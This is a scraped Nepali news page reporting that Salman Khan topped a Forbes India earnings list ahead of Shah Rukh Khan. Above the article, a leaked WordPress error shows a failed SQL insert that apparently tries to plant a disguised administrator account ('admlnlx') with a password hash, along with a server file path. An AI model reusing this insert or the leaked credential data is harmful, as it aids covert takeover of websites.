WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmpzcxMa7Dj3OGYQwH8hjjB8YxaZmI0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:59:09', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
शाहरुख खानलाई उछिने सलमानले, बने सबैभन्दा बढी कमाउने सेलिब्रेटी – Gaule Khabar

शाहरुख खानलाई उछिने सलमानले, बने सबैभन्दा बढी कमाउने सेलिब्रेटी

शाहरुख खानलाई उछिने सलमानले, बने सबैभन्दा बढी कमाउने सेलिब्रेटी

एजेन्सी,पुस १०-

हिन्दी चलचित्रका सुपरस्टार सलमान खानले शाहरुख खानलाई उछिन्दै सबैभन्दा बढी कमाउने सेलिब्रेटी बनेका छन् । उनी फोब्र्स इन्डियाले निकालेको बढी कमाउने सेलिब्रेटीको सूचीको पहिलो नम्बरमा आएका हुन् । फोब्र्स इन्डियाले १ सय जनाको सूचीमा खान पहिलो नम्बरमा परेको जनाएको हो ।

उक्त पत्रिकाका अनुसार सलमानको अनुमानित बार्षिक आम्दानी करिब २७० करोड भारतीय रुपैयाँभन्दा माथि रहेको छ । बढी कमाउनेको सूचीमा विराट कोहली, अक्षय कुमार र एम एस धोनी पनि रहेका छन् । तर, प्रसिद्धिको हिसाबले भने सलमान खान दोस्रो स्थानमा छन् । यसमा उनलाई विराट कोहलीले उछिनेका छन् । बढी कमाउने सूचीको दोस्रो नम्बरमा भने शाहरुख खान परेका छन् । उनको आम्दानी २२१ करोड भारु भन्दा माथि रहेको छ । एजेन्सी

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका